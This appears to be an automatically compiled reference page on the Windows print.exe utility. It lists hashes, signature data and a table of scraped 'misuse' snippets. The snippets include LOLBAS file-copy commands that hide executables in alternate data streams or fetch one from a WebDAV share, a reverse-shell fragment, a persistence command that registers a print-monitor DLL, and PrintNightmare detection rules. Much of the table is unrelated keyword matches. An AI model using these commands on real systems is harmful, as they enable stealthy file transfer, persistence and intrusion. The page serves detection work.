# print.exe

- File Path: C:\Windows\system32\print.exe
- Description: Print Utility

## Hashes

Type | Hash |
---|---|
MD5 | 63E11431499B9603D21BA075543CD415 |
SHA1 | 38FC357A66EF90D84FA07509DFD9071B54EB345D |
SHA256 | 388D6761E678C66EEDA7085A05E10B13ABF88F855B753300C0F9B0D94DDB4DB0 |
SHA384 | 48540D170C7BB0ACEA8A706705AC77492886CAA3391D09545E585ECFA3E7A0491DBDA215778C9F9C2F6FE43B6C13BE42 |
SHA512 | 997F4CD774102FC867A7BD4C5851C13E6C160323937A31EF7678234F47EFA19E9AF492D13A37E294DF20144F8DAE6A7A7D62E0134CF0E2536FADFCCC5A4453A6 |
SSDEEP | 192:Ks0CHkYa05foZiaDsqBNCh7MtKd+46Pv+DxlzezB/HQYjkGpnX4dhiJmVWzUW:vXbjaNNtkdU6xBezB/UQnXCVWzUW |
IMP | D67C73847BD1DC0D9109BA544AD6C11D |
PESHA1 | 50A77BD35AC84ECAC14CC2E25B7735F9BB89A11D |
PE256 | 98FD7307A07AD66A5718C153284BEF7A46CED530C146EEE728D61402540AE49C |
## Runtime Data

Usage (stdout):

```
Prints a text file.
PRINT [/D:device] [[drive:][path]filename[...]]
/D:device Specifies a print device.
```

Loaded Modules:

Path |
---|
C:\Windows\System32\KERNEL32.DLL |
C:\Windows\System32\KERNELBASE.dll |
C:\Windows\SYSTEM32\ntdll.dll |
C:\Windows\system32\print.exe |
## Signature

- Status: Signature verified.
- Serial: 3300000266BD1580EFA75CD6D3000000000266
- Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
- Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
## File Metadata

- Original Filename: Print.Exe.MUI
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.19041.1 (WinBuild.160101.0800)
- Product Version: 10.0.19041.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
- Machine Type: 64-bit
## File Scan

- VirusTotal Detections: 0/75
- VirusTotal Link: https://www.virustotal.com/gui/file/388d6761e678c66eeda7085a05e10b13abf88f855b753300c0f9b0d94ddb4db0/detection
## Possible Misuse

The following table contains possible examples of print.exe being misused. While print.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source | Source File | Example | License |
---|---|---|---|
sigma | av_printernightmare_cve_2021_34527.yml | description: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 . | DRL 1.0 |
sigma | lnx_shell_susp_rev_shells.yml | - ';while(cmd=c.gets);IO.popen(cmd,"r"){\|io\|c.print' | DRL 1.0 |
sigma | zeek_dce_rpc_printnightmare_print_driver_install.yml | title: Possible PrintNightmare Print Driver Install | DRL 1.0 |
sigma | zeek_dce_rpc_printnightmare_print_driver_install.yml | Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). | DRL 1.0 |
sigma | zeek_dce_rpc_printnightmare_print_driver_install.yml | The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy. | DRL 1.0 |
sigma | win_exploit_cve_2021_1675_printspooler.yml | title: Possible CVE-2021-1675 Print Spooler Exploitation | DRL 1.0 |
sigma | win_exploit_cve_2021_1675_printspooler.yml | description: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675 | DRL 1.0 |
sigma | win_exploit_cve_2021_1675_printspooler.yml | - 'The print spooler failed to load a plug-in module' | DRL 1.0 |
sigma | win_exploit_cve_2021_1675_printspooler_operational.yml | title: CVE-2021-1675 Print Spooler Exploitation | DRL 1.0 |
sigma | win_exploit_cve_2021_1675_printspooler_operational.yml | description: Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 | DRL 1.0 |
sigma | win_exploit_cve_2021_1675_printspooler_security.yml | title: CVE-2021-1675 Print Spooler Exploitation IPC Access | DRL 1.0 |
sigma | win_exploit_cve_2021_1675_printspooler_security.yml | description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527 | DRL 1.0 |
sigma | file_event_win_cve_2021_1675_printspooler.yml | title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern | DRL 1.0 |
sigma | file_event_win_cve_2021_1675_printspooler.yml | description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675 | DRL 1.0 |
sigma | proc_creation_win_susp_print.yml | title: Abusing Print Executable | DRL 1.0 |
sigma | proc_creation_win_susp_print.yml | description: Attackers can use print.exe for remote file copy | DRL 1.0 |
sigma | proc_creation_win_susp_print.yml | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Print.yml | DRL 1.0 |
sigma | proc_creation_win_susp_print.yml | - \print.exe | DRL 1.0 |
sigma | proc_creation_win_susp_print.yml | - print | DRL 1.0 |
sigma | proc_creation_win_susp_print.yml | - print.exe | DRL 1.0 |
sigma | proc_creation_win_susp_spoolsv_child_processes.yml | description: Detects suspicious print spool service (spoolsv.exe) child processes. | DRL 1.0 |
sigma | proc_creation_win_susp_spoolsv_child_processes.yml | - https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md | DRL 1.0 |
sigma | registry_event_add_port_monitor.yml | TargetObject\|startswith: 'HKLM\System\CurrentControlSet\Control\Print\Monitors\' | DRL 1.0 |
sigma | registry_event_add_port_monitor.yml | TargetObject\|contains: '\System\CurrentControlSet\Control\Print\Monitors\CutePDF Writer Monitor v4.0\Driver' | DRL 1.0 |
sigma | registry_event_asep_reg_keys_modification.yml | - '\Print\Providers' | DRL 1.0 |
sigma | registry_event_asep_reg_keys_modification.yml | - '\Print\Monitors' | DRL 1.0 |
sigma | registry_event_asep_reg_keys_modification_currentcontrolset.yml | - '\Print\Providers' | DRL 1.0 |
sigma | registry_event_asep_reg_keys_modification_currentcontrolset.yml | - '\Print\Monitors' | DRL 1.0 |
sigma | registry_event_asep_reg_keys_modification_currentcontrolset.yml | TargetObject\|contains: '\Print\Monitors\CutePDF Writer Monitor' | DRL 1.0 |
sigma | registry_event_mimikatz_printernightmare.yml | - '\Control\Print\Environments\Windows x64\Drivers\Version-3\QMS 810\' | DRL 1.0 |
sigma | registry_event_mimikatz_printernightmare.yml | - '\Control\Print\Environments\Windows x64\Drivers\Version-3\mimikatz' | DRL 1.0 |
sigma | registry_event_mimikatz_printernightmare.yml | - '\Control\Print\Environments\Windows' | DRL 1.0 |
sigma | registry_event_mimikatz_printernightmare.yml | - '\Control\Print\Environments' | DRL 1.0 |
sigma | registry_event_mimikatz_printernightmare.yml | - '\CurrentVersion\Print\Printers' | DRL 1.0 |
sigma | registry_event_susp_printer_driver.yml | - '\Control\Print\Environments\Windows x64\Drivers' | DRL 1.0 |
LOLBAS | Print.yml | Name: Print.exe | |
LOLBAS | Print.yml | - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe | |
LOLBAS | Print.yml | - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe | |
LOLBAS | Print.yml | - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe | |
LOLBAS | Print.yml | - Path: C:\Windows\System32\print.exe | |
LOLBAS | Print.yml | - Path: C:\Windows\SysWOW64\print.exe | |
LOLBAS | Print.yml | - IOC: Print.exe retrieving files from internet | |
LOLBAS | Print.yml | - IOC: Print.exe creating executable files on disk | |
LOLBAS | Mshtml.yml | Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). | |
malware-ioc | deprimon | https://www.welivesecurity.com/2019/11/21/deprimon-default-print-monitor-malicious-downloader/[WeLiveSecurity]. | © ESET 2014-2018 |
malware-ioc | deprimon | [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Windows Default Print Monitor] | © ESET 2014-2018 |
malware-ioc | nouns.txt | print | © ESET 2014-2018 |
malware-ioc | mumblehard | under the Perl interpreter. The following command ran as root will print the | © ESET 2014-2018 |
malware-ioc | mumblehard | ps -ef \| grep -e ' httpd$' -e ' mail$' -e ' init$' \| awk '{print $2}' \| xargs -I '{}' ls -l '/proc/{}/exe' \| grep perl \| cut -d/ -f 3 | © ESET 2014-2018 |
malware-ioc | 2020_Q4 | HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\BcastDVRUserService_6d67d\Driver | © ESET 2014-2018 |
malware-ioc | 2020_Q4 | HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\BcastDVRUserService_3c628o\Driver | © ESET 2014-2018 |
malware-ioc | 2020_Q4 | HKLM\SOFTWARE\Microsoft\Print\Components\Spooler-PPC\{94E5H6D48A-P895-85E1-54DD-080636B11A03} | © ESET 2014-2018 |
malware-ioc | 2020_Q4 | HKLM\SOFTWARE\Microsoft\Print\Components\Spooler-PPC\{38C8D238Q-923C-D782-9B8J-829263CD85C9} | © ESET 2014-2018 |
malware-ioc | vf_ioc_linux_rakos.py | print("Suspected PID: {0:8s} {1:<16}:{2:>5} {3:<16}:{4:>5} {5:<15s} {6:>17s}/{7:<5d}\n".format(proto, saddr, sport, daddr, dport, state, task.comm, task.pid)) | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_str_ : "; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "$f : crypted, skip\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print $fc. "\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_ssh: \n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd1: '$sd[1]':'$sd[2]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc1: '$sc[1]':'$sc[2]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd1a: file:'$sd[4]'; hash:'$sd[15]'; cvs:'$sd[1]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd2: '$sd[1]':'$sd[2]':'$sd[3]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc4: '$sc[1]':'$sc[0]'\n" if @sc and f $sc[1]; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd4: '$sd[0]':'$sd[1]':'$sd[2]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd5: " . join( '\|', @sd ) . "\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd6: '$sd[2]':'$sd[0]'\nmod_sshc6: '$sc[0]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd7: '$sd[0]':'$sd[4]'\nmod_sshc7: '$sc[0]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd8: '$sd[1]':'$sd[2]'\nmod_sshc8: '$sc[1]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | if (@sd) { print "mod_sshd12: GET, no params"; ssh_ls() } | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd14: hash:'$sd[3]':'$sd[4]':'$sd[2]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc14: hash:'$sd[3]':'$sd[4]':'$sd[2]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | else { print "mod_sshd14: unknown hash; fpass:'$sd[1]';'$sd[3]'\n" } | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod14p: $d\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd15: '$sd[0]':'$sd[2]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc15: '$sc[38]':'$sc[0]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd16: '$sd[0]':'$sd[1]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc16: '$sc[1]':'$sc[0]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd17: crypt:'$sd[2]':'$sd[0]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc17: '$sc[0]':'$sc[1]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd17: client_string:'$q[1]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd18: md5:'$sd[3]':'$sd[0]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc18: md5:'$sc[3]':'$sc[0]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd19: '$sd[0]':'$sd[1]' url:'$sd[5] '$sd[4]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd20: '$sd[0]':'$sd[1]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc20: '$sc[0]':'$sc[1]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd21: '$sd[0]' mod_sshc21: '$sc[0]':'$sc[1]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc22: '$sd[0]':'$sd[1]':'$sd[2]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd23: '$sd[2]':'$sd[0]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc23: '$sc[0]':'$sc[1]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd24: '$sd[0]':'$sd[17]':'$sd[18]:$sd[20]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc24: '$sc[1]':'$sc[0]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd25: '$sd[2]':'$sd[0]' mod_sshc25: '$sc[0]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd27: '$sd[0]':'$sd[2]':'$sd[1]'\nmod_sshc27: '$sc[0]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd31: hash:'$sd[2]':'$sd[1]':'$sd[0]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd32: md5:'$sd1[0]:'$sd[0]':'$sc[0]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd33: '$sd[0]':'$sd[1]':'$sc[0]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print $q. "\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd36: md5:'$sd[0]':'$sc[0]'; '$sd[1]':'$sc[1]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd37: md5:'$sd[0]'; '$sd[1]':'$sd[3]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | while (<$fn>) { chomp; print $_ ^ "\x14" x length $_ } | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_ssh41_cstr: " . join( '\|', sort keys %ostr ) . "\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd41: '$sd[1]' '$sd[0]', crypted\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc41: '$sc[1]' '$sc[0]', crypted\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd42: detected; log_useragent:passwd_file:passwd\n" if @sd; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc42: detected\n" if @sc; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd44: pass:'$sd[1]' '$sd[0]', '$sd[2]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | if ( $sc[0] ) { print "mod_sshc44: '$sc[0]' '$sc[13]'\n"; ssh_ls( $sd[0] ) } | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd45: pass:'$sd[1]' host:'$sd[0]', '$sd[2]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | if ( $sc[0] ) { print "mod_sshc45: host:'$sc[0]' '$sc[1]'\n"; ssh_ls() } | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd46: crypt:'$sc[1]' v1:'$sd[1]' v2:'$sd[2]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd47: pass:'$sd[0]' '$sd[1]', '$sd[2]'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | if (@sc) { print "mod_sshc47: host:'$sc[0]' '$sc[-1]'\n"; ssh_ls( $sc[0] ) } | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | for (@sd) { print "mod_md5_sshd: '$_'\n" } | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | for (@sc) { print "mod_md5_ssh: '$_'\n" } | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_md5_static_ssl: $static_ssl\n" if $static_ssl; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_hack_strd: possible hacked, " . join( "\|", @sd ) . "\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_hack_strc: possible hacked, " . join( "\|", @sc ) . "\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | for (@sd) { print "mod_md5_sshd1: '$_'\n" } | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_str_sshd_str: '" . join( "':'", keys %ostr ) . "'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_str_sshd_str1: '" . join( "':'", keys %ostr ) . "'\n"; | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | if (@sd) { print "sshd_str: " . join( '\|', @sd ) . "\n" } | © ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | if (@sc) { print "sshc_str: " . join( '\|', @sc ) . "\n" } | © ESET 2014-2018 |
malware-ioc | turla | ** ResultQueue::print``{:.highlight .language-cmhg} | © ESET 2014-2018 |
malware-ioc | turla | ** TaskQueue::print``{:.highlight .language-cmhg} | © ESET 2014-2018 |
malware-ioc | windigo | print the dynamic section of the ELF header. Anything NEEDED (type 1) other | © ESET 2014-2018 |
malware-ioc | windigo | OpenSSH version 6.7 or earlier. A clean server will print | © ESET 2014-2018 |
malware-ioc | windigo | to stderr but an infected server will only print the usage (note the missing | © ESET 2014-2018 |
malware-ioc | windigo | yields no output if one is not infected and would print a filename if one is. | © ESET 2014-2018 |
malware-ioc | windigo | ps -ef \| grep crond \| grep -v grep \| awk '{print $2}' | © ESET 2014-2018 |
malware-ioc | winnti_group | HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\PrintFiiterPipelineSvc\Driver = “DEment.dll” | © ESET 2014-2018 |
malware-ioc | winnti_group | HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\lltdsvc1\Driver = “EntAppsvc.dll” | © ESET 2014-2018 |
malware-ioc | winnti_group | HKLM\SOFTWARE\Microsoft\Print\Components\DC20FD7E-4B1B-4B88-8172-61F0BED7D9E8 | © ESET 2014-2018 |
malware-ioc | winnti_group | HKLM\SOFTWARE\Microsoft\Print\Components\A66F35-4164-45FF-9CB4-69ACAA10E52D | © ESET 2014-2018 |
atomic-red-team | index.md | - T1547.012 Print Processors CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - T1547.012 Print Processors CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | matrix.md | \| \| \| Outlook Forms CONTRIBUTE A TEST \| Print Processors CONTRIBUTE A TEST \| Impair Defenses CONTRIBUTE A TEST \| \| \| \| \| \| \| \| \| | MIT License. © 2018 Red Canary |
atomic-red-team | matrix.md | \| \| \| Print Processors CONTRIBUTE A TEST \| Services File Permissions Weakness CONTRIBUTE A TEST \| Masquerade Task or Service \| \| \| \| \| \| \| \| \| | MIT License. © 2018 Red Canary |
atomic-red-team | windows-matrix.md | \| \| \| Password Filter DLL \| Print Processors CONTRIBUTE A TEST \| Indicator Removal from Tools CONTRIBUTE A TEST \| \| \| \| \| \| \| \| \| | MIT License. © 2018 Red Canary |
atomic-red-team | windows-matrix.md | \| \| \| Print Processors CONTRIBUTE A TEST \| Security Support Provider \| Mark-of-the-Web Bypass \| \| \| \| \| \| \| \| \| | MIT License. © 2018 Red Canary |
atomic-red-team | T1016.md | if [ -x "$(command -v netstat)" ]; then netstat -ant \| awk '{print $NF}' \| grep -v '[a-z]' \| sort \| uniq -c; else echo "netstat is missing from the machine. skipping..."; fi; | MIT License. © 2018 Red Canary |
atomic-red-team | T1018.md | Upon successful execution, cmd.exe will execute net.exe view and display results of local systems on the network that have file and print sharing enabled. | MIT License. © 2018 Red Canary |
atomic-red-team | T1018.md | adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} | MIT License. © 2018 Red Canary |
atomic-red-team | T1027.004.md | Upon execution, the exe will print 'T1027.004 Dynamic Compile'. | MIT License. © 2018 Red Canary |
atomic-red-team | T1036.006.md | 1. echo '#!/bin/bash\necho "print "hello, world!"" \| /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt | MIT License. © 2018 Red Canary |
atomic-red-team | T1059.003.md | - Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing | MIT License. © 2018 Red Canary |
atomic-red-team | T1059.003.md | ## Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing | MIT License. © 2018 Red Canary |
atomic-red-team | T1059.003.md | It is designed to mimic BlackByte ransomware’s print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. | MIT License. © 2018 Red Canary |
atomic-red-team | T1059.003.md | \| max_to_print \| The maximum number of Wordpad windows the test will open/print. \| String \| 75\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1059.003.md | ##### Description: File to print must exist on disk at specified location (#{file_to_print}) | MIT License. © 2018 Red Canary |
atomic-red-team | T1082.md | in order simply print the recon results to the screen as opposed to exfiltrating them. Script. | MIT License. © 2018 Red Canary |
atomic-red-team | T1083.md | cd $HOME && find . -print \| sed -e 's;[^/]*/;\|;g;s;\|; \|;g' > #{output_file} | MIT License. © 2018 Red Canary |
atomic-red-team | T1110.003.md | This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like “[*] username:password”, whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray. | MIT License. © 2018 Red Canary |
atomic-red-team | T1127.001.md | Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print “Hello From a Code Fragment” and “Hello From a Class.” to the screen. | MIT License. © 2018 Red Canary |
atomic-red-team | T1127.001.md | Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print “Hello from a Visual Basic inline task!” to the screen. | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | \| message \| Message to print to the screen \| String \| Hello from Atomic Red Team test T1140!\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | ENCODED=$(python3 -c 'import base64;enc=base64.b64encode("#{message}".encode());print(enc.decode())') | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | python3 -c "import base64;dec=base64.b64decode("$ENCODED");print(dec.decode())" | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | python3 -c "import base64 as d;dec=d.b64decode("$ENCODED");print(dec.decode())" | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | python3 -c "from base64 import b64decode;dec=b64decode("$ENCODED");print(dec.decode())" | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | python3 -c "from base64 import b64decode as d;dec=d("$ENCODED");print(dec.decode())" | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | echo $ENCODED \| python3 -c "import base64,sys;dec=base64.b64decode(sys.stdin.read());print(dec.decode())" | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | echo $ENCODED > #{encoded_file} && python3 -c "import base64;dec=base64.b64decode(open('#{encoded_file}').read());print(dec.decode())" | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | ENCODED=$(perl -e "use MIME::Base64;print(encode_base64('#{message}'));") | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | perl -le "use MIME::Base64;print(decode_base64('$ENCODED'));" | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | echo $ENCODED \| perl -le 'use MIME::Base64;print(decode_base64( | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | echo $ENCODED > #{encoded_file} && perl -le 'use MIME::Base64;open($f,"<","#{encoded_file}");print(decode_base64(<$f>));' | MIT License. © 2018 Red Canary |
atomic-red-team | T1485.md | dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} \| awk '{print $5}') iflag=count_bytes | MIT License. © 2018 Red Canary |
atomic-red-team | T1489.md | Stops a specified service using the net.exe command. Upon execution, if the service was running “The Print Spooler service was stopped successfully.” | MIT License. © 2018 Red Canary |
atomic-red-team | T1489.md | will be displayed. If the service was not running, “The Print Spooler service is not started.” will be displayed and it can be | MIT License. © 2018 Red Canary |
atomic-red-team | T1518.md | /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist | MIT License. © 2018 Red Canary |
atomic-red-team | T1518.md | /usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.001.md | * HKEY_CLASSES_ROOT\txtfile\shell\print\command | MIT License. © 2018 Red Canary |
atomic-red-team | T1547.010.md | <blockquote>Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors . | MIT License. © 2018 Red Canary |
atomic-red-team | T1547.010.md | reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ | MIT License. © 2018 Red Canary |
atomic-red-team | T1547.010.md | reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 | MIT License. © 2018 Red Canary |
atomic-red-team | T1562.004.md | Print the last 10 lines of the Uncomplicated Firewall (UFW) log file | MIT License. © 2018 Red Canary |
atomic-red-team | T1564.004.md | print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe | MIT License. © 2018 Red Canary |
signature-base | apt_backdoor_ssh_python.yar | $s1 = “print ‘[-] (Failed to load moduli – gex will be unsupported.)’” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_backdoor_ssh_python.yar | $s2 = “print ‘[-] Listen/bind/accept failed: ‘ + str(e)” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_backdoor_ssh_python.yar | $s4 = “print ‘[-] SSH negotiation failed.’” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $x2 = “print "Gimme hex: ";” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $s3 = “print "$hex in decimal=$dec\n\n";” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $s2 = “print "ERROR: the filename or hex representation needs to be one argument try using \"’s\n";” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $s5 = “print hextoIP($ARGV[0]);” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $s2 = “print »out, "%s%04x " % (lead,i),” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $s3 = “print »out, "%02X" % ord(x[i+j]),” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $s4 = “print »out, sane(x[i:i+16])” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $s1 = “print "[+] Connecting to %s:%s" % (self.params.dst[‘ip’], self.params.dst[‘port’])” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $s6 = “print "[-] keyboard interrupt before response received"” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $s8 = “print ‘Debug info ‘,’=’*40” fullword ascii | CC BY-NC 4.0 |
